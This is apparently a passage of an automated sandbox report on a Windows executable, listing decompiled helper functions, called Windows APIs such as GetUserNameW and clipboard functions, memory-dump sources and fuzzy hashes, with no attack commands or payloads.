                                                                                                                                                                                                                            • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 004065A0
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 004065B6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                                                          • String ID: _lng.ini
                                                                                                                                                                                                                          • API String ID: 383090722-1948609170
                                                                                                                                                                                                                          • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                                                                                                                          • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E0040AC52() {
                                                                                                                                                                                                                          				struct HINSTANCE__* _t1;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t2;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				if( *0x4101c4 == 0) {
                                                                                                                                                                                                                          					_t1 = E00405436(L"shell32.dll");
                                                                                                                                                                                                                          					 *0x4101c4 = _t1;
                                                                                                                                                                                                                          					if(_t1 != 0) {
                                                                                                                                                                                                                          						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
                                                                                                                                                                                                                          						 *0x4101c0 = _t2;
                                                                                                                                                                                                                          						return _t2;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t1;
                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                                                                            • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                                                                                                                          • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                                                          • API String ID: 946536540-880857682
                                                                                                                                                                                                                          • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                                                                                                                          • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                          			E00406670(char** __esi, void* __eflags) {
                                                                                                                                                                                                                          				char* _t30;
                                                                                                                                                                                                                          				char** _t39;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t39 = __esi;
                                                                                                                                                                                                                          				 *__esi = "cf@";
                                                                                                                                                                                                                          				__esi[0xb8] = 0;
                                                                                                                                                                                                                          				_t30 = E00404FA4(0x338, __esi);
                                                                                                                                                                                                                          				_push(0x14);
                                                                                                                                                                                                                          				__esi[0xcb] = 0;
                                                                                                                                                                                                                          				__esi[0xa6] = 0;
                                                                                                                                                                                                                          				__esi[0xb9] = 0;
                                                                                                                                                                                                                          				__esi[0xba] = 0xfff;
                                                                                                                                                                                                                          				__esi[8] = 0;
                                                                                                                                                                                                                          				__esi[1] = 0;
                                                                                                                                                                                                                          				__esi[0xb7] = 1;
                                                                                                                                                                                                                          				L0040B26C();
                                                                                                                                                                                                                          				if(_t30 == 0) {
                                                                                                                                                                                                                          					_t30 = 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t30[4] = 0;
                                                                                                                                                                                                                          					_t30[0x10] = 0;
                                                                                                                                                                                                                          					_t30[8] = 0;
                                                                                                                                                                                                                          					_t30[0xc] = 0x100;
                                                                                                                                                                                                                          					 *_t30 = 0;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_push(0x14);
                                                                                                                                                                                                                          				_t39[2] = _t30;
                                                                                                                                                                                                                          				L0040B26C();
                                                                                                                                                                                                                          				if(_t30 == 0) {
                                                                                                                                                                                                                          					_t30 = 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t30[4] = 0;
                                                                                                                                                                                                                          					_t30[0x10] = 0;
                                                                                                                                                                                                                          					_t30[8] = 0;
                                                                                                                                                                                                                          					_t30[0xc] = 0x100;
                                                                                                                                                                                                                          					 *_t30 = 0;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_push(0x14);
                                                                                                                                                                                                                          				_t39[3] = _t30;
                                                                                                                                                                                                                          				L0040B26C();
                                                                                                                                                                                                                          				if(_t30 == 0) {
                                                                                                                                                                                                                          					_t30 = 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t30[4] = 0;
                                                                                                                                                                                                                          					_t30[0x10] = 0;
                                                                                                                                                                                                                          					_t30[8] = 0;
                                                                                                                                                                                                                          					_t30[0xc] = 0x100;
                                                                                                                                                                                                                          					 *_t30 = 0;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_push(0x14);
                                                                                                                                                                                                                          				_t39[4] = _t30;
                                                                                                                                                                                                                          				L0040B26C();
                                                                                                                                                                                                                          				if(_t30 == 0) {
                                                                                                                                                                                                                          					_t30 = 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t30[4] = 0;
                                                                                                                                                                                                                          					_t30[0x10] = 0;
                                                                                                                                                                                                                          					_t30[8] = 0;
                                                                                                                                                                                                                          					_t30[0xc] = 0x100;
                                                                                                                                                                                                                          					 *_t30 = 0;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t39[5] = _t30;
                                                                                                                                                                                                                          				return _t39;
                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
• Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
• Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@$memset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1860491036-0
                                                                                                                                                                                                                          • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                                                                                                                          • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				int _t32;
                                                                                                                                                                                                                          				intOrPtr _t33;
                                                                                                                                                                                                                          				intOrPtr _t36;
                                                                                                                                                                                                                          				signed int _t48;
                                                                                                                                                                                                                          				signed int _t58;
                                                                                                                                                                                                                          				signed int _t59;
                                                                                                                                                                                                                          				void** _t62;
                                                                                                                                                                                                                          				void** _t63;
                                                                                                                                                                                                                          				signed int* _t66;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t66 = __eax;
                                                                                                                                                                                                                          				_t32 = wcslen(_a4);
                                                                                                                                                                                                                          				_t48 =  *(_t66 + 4);
                                                                                                                                                                                                                          				_t58 = _t48 + _t32;
                                                                                                                                                                                                                          				_v12 = _t58;
                                                                                                                                                                                                                          				_t59 = _t58 + 1;
                                                                                                                                                                                                                          				_v8 = _t32;
                                                                                                                                                                                                                          				_t33 =  *((intOrPtr*)(_t66 + 0x14));
                                                                                                                                                                                                                          				 *(_t66 + 4) = _t59;
                                                                                                                                                                                                                          				_t62 = _t66 + 0x10;
                                                                                                                                                                                                                          				if(_t59 != 0xffffffff) {
                                                                                                                                                                                                                          					E00404951(_t66, _t59, _t62, 2, _t33);
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					free( *_t62);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t60 =  *(_t66 + 0x1c);
                                                                                                                                                                                                                          				_t36 =  *((intOrPtr*)(_t66 + 0x18));
                                                                                                                                                                                                                          				_t63 = _t66 + 0xc;
                                                                                                                                                                                                                          				if( *(_t66 + 0x1c) != 0xffffffff) {
                                                                                                                                                                                                                          					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					free( *_t63);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
                                                                                                                                                                                                                          				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
                                                                                                                                                                                                                          				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
                                                                                                                                                                                                                          				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
                                                                                                                                                                                                                          				_t30 =  *(_t66 + 0x1c) - 1; // -1
                                                                                                                                                                                                                          				return _t30;
                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 004054EC
                                                                                                                                                                                                                          • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                                                                                                                                                                            • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                                                                                                                                                                            • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                                                                                                                                                                            • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                                                                                                                          • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00405556
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 726966127-0
                                                                                                                                                                                                                          • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                                                                                                                          • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                                                                          			E00405ADF() {
                                                                                                                                                                                                                          				void* _t25;
                                                                                                                                                                                                                          				signed int _t27;
                                                                                                                                                                                                                          				signed int _t29;
                                                                                                                                                                                                                          				signed int _t31;
                                                                                                                                                                                                                          				signed int _t33;
                                                                                                                                                                                                                          				signed int _t50;
                                                                                                                                                                                                                          				signed int _t52;
                                                                                                                                                                                                                          				signed int _t54;
                                                                                                                                                                                                                          				signed int _t56;
                                                                                                                                                                                                                          				intOrPtr _t60;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t60 =  *0x41c470;
                                                                                                                                                                                                                          				if(_t60 == 0) {
                                                                                                                                                                                                                          					_t50 = 2;
                                                                                                                                                                                                                          					 *0x41c470 = 0x8000;
                                                                                                                                                                                                                          					_t27 = 0x8000 * _t50;
                                                                                                                                                                                                                          					 *0x41c474 = 0x100;
                                                                                                                                                                                                                          					 *0x41c478 = 0x1000;
                                                                                                                                                                                                                          					_push( ~(0 | _t60 > 0x00000000) | _t27);
                                                                                                                                                                                                                          					L0040B26C();
                                                                                                                                                                                                                          					 *0x41c458 = _t27;
                                                                                                                                                                                                                          					_t52 = 4;
                                                                                                                                                                                                                          					_t29 =  *0x41c474 * _t52;
                                                                                                                                                                                                                          					_push( ~(0 | _t60 > 0x00000000) | _t29);
                                                                                                                                                                                                                          					L0040B26C();
                                                                                                                                                                                                                          					 *0x41c460 = _t29;
                                                                                                                                                                                                                          					_t54 = 4;
                                                                                                                                                                                                                          					_t31 =  *0x41c474 * _t54;
                                                                                                                                                                                                                          					_push( ~(0 | _t60 > 0x00000000) | _t31);
                                                                                                                                                                                                                          					L0040B26C();
                                                                                                                                                                                                                          					 *0x41c464 = _t31;
                                                                                                                                                                                                                          					_t56 = 2;
                                                                                                                                                                                                                          					_t33 =  *0x41c478 * _t56;
                                                                                                                                                                                                                          					_push( ~(0 | _t60 > 0x00000000) | _t33);
                                                                                                                                                                                                                          					L0040B26C();
                                                                                                                                                                                                                          					 *0x41c45c = _t33;
                                                                                                                                                                                                                          					return _t33;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t25;
                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1033339047-0
                                                                                                                                                                                                                          • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                                                                                                                          • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetUserNameW.ADVAPI32(00000000,00000000), ref: 05EDB63B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.920321711.0000000005ED0000.00000040.00000001.sdmp, Offset: 05ED0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: NameUser
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2645101109-0
                                                                                                                                                                                                                          • Opcode ID: 768f8faf0180640470d53e6ed22ed291a89fe38dd1c4c83a3e80b50e54670dd0
                                                                                                                                                                                                                          • Instruction ID: 4b4a93c95a32d4c5370c968c9fda687554bc14e05738542fc78c6bdb0ab9353c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 768f8faf0180640470d53e6ed22ed291a89fe38dd1c4c83a3e80b50e54670dd0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5851F3B0D002188FDB14CFA9C885B9DFBB5BF48314F168129D855AB390E775A845CFA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 02B969A0
                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 02B969DD
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 02B96A1A
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 02B96A73
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.915197066.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2063062207-0
                                                                                                                                                                                                                          • Opcode ID: 0a3e0a2cb89209946bd6ca976d52e9420ec43c4ec8ad927ada27b8ca3062b8ce
                                                                                                                                                                                                                          • Instruction ID: 866ae258cb10ee379ca7ce4a6fc7950efafda8613bae2b89e51d9b56664c90ff
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a3e0a2cb89209946bd6ca976d52e9420ec43c4ec8ad927ada27b8ca3062b8ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C5167B49002488FDB14CFA9D649BDEBBF4EF48314F2084A9E419B7750DB74A884CF65
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.915197066.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 63546d476568b18621aaa9ced7ee2a9867d79921e99b83f48faf67d93fcf58a7
                                                                                                                                                                                                                          • Instruction ID: a0c73505e91c0fd922cb9df792b1f91fc14d607809dcde1744346e96bf4b23fd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63546d476568b18621aaa9ced7ee2a9867d79921e99b83f48faf67d93fcf58a7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B5103B1C00249AFDF16CFA9C980ADDBFB1FF49314F65816AE818AB220D7759985CF50
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.920321711.0000000005ED0000.00000040.00000001.sdmp, Offset: 05ED0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: e555b5c37423f1b71d13caae0358028bc80dcc8d1f2d75284161c92021a1e35a
                                                                                                                                                                                                                          • Instruction ID: 9abbf7d3776d0d3367e08e5a65858a58db98e78d77d81b4a4d0272412c629ef5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e555b5c37423f1b71d13caae0358028bc80dcc8d1f2d75284161c92021a1e35a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 955146B0D042188FDB04CFA8C885BADFBB5BF48314F16841AD895AB391E7749845CFA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetUserNameW.ADVAPI32(00000000,00000000), ref: 05EDB63B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.920321711.0000000005ED0000.00000040.00000001.sdmp, Offset: 05ED0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: NameUser
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2645101109-0
                                                                                                                                                                                                                          • Opcode ID: 66a941a28544f8457a259361c1001e0ac82e383fe563eeeac3688b0af492f613
                                                                                                                                                                                                                          • Instruction ID: f409a7f5c277f3c10bea3da53040f6b8ed49662c95ad4a94c44e5a742f8363c8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66a941a28544f8457a259361c1001e0ac82e383fe563eeeac3688b0af492f613
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC51F3B0E002188FDB14CFA9C885B9DFBB5BF48314F168129E855BB390E775A845CFA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02B951A2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.915197066.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                                                                                          • Opcode ID: 2307805138fbb4d137d3820c8fe43c902743a24cf0b8b1095305365a30604721
                                                                                                                                                                                                                          • Instruction ID: 5767298a1dd2f7bcf5c719ae876f78a2a6f17ad873b526b919bf060fa4f58302
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2307805138fbb4d137d3820c8fe43c902743a24cf0b8b1095305365a30604721
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8741CFB1D003189FDF15CFA9C984ADEBBB5FF48314F64812AE819AB210D774A885CF90
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,05EDC127), ref: 05EDC1BF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.920321711.0000000005ED0000.00000040.00000001.sdmp, Offset: 05ED0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                                                                                          • Opcode ID: ddbcebd49608e6dd56597e72ee7c4eee758674d4de4f0fd886170cee7b9fbcef
                                                                                                                                                                                                                          • Instruction ID: f3941a5be3340ce18b5527c8966903da73b79c1a8072d9f2e0a917f96ba9cc45
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ddbcebd49608e6dd56597e72ee7c4eee758674d4de4f0fd886170cee7b9fbcef
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1231C0B19083948FDB01DFA8D9446DEBFF0AF09224F19449AD449E7752D7389885CFA1
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 02B97F09
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.915197066.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CallProcWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2714655100-0
                                                                                                                                                                                                                          • Opcode ID: ef350b8a9fbb42a7d22be318b613b45340e75b12fd6725f8a55da094558f7e35
                                                                                                                                                                                                                          • Instruction ID: be563126dff57e4532e135f7ee5ec2cb501568c3941bd3e1dd354ca875a46846
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef350b8a9fbb42a7d22be318b613b45340e75b12fd6725f8a55da094558f7e35
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68414EB5A103458FDB14CF99C548BAAFBF9FF88314F258499E419AB721D734A841CFA0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 02B9C222
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.915197066.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EncodePointer
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2118026453-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.920321711.0000000005ED0000.00000040.00000001.sdmp, Offset: 05ED0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Clipboard
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 220874293-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.920321711.0000000005ED0000.00000040.00000001.sdmp, Offset: 05ED0000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Clipboard
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 220874293-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B96BEF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000012.00000002.915197066.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B96BEF
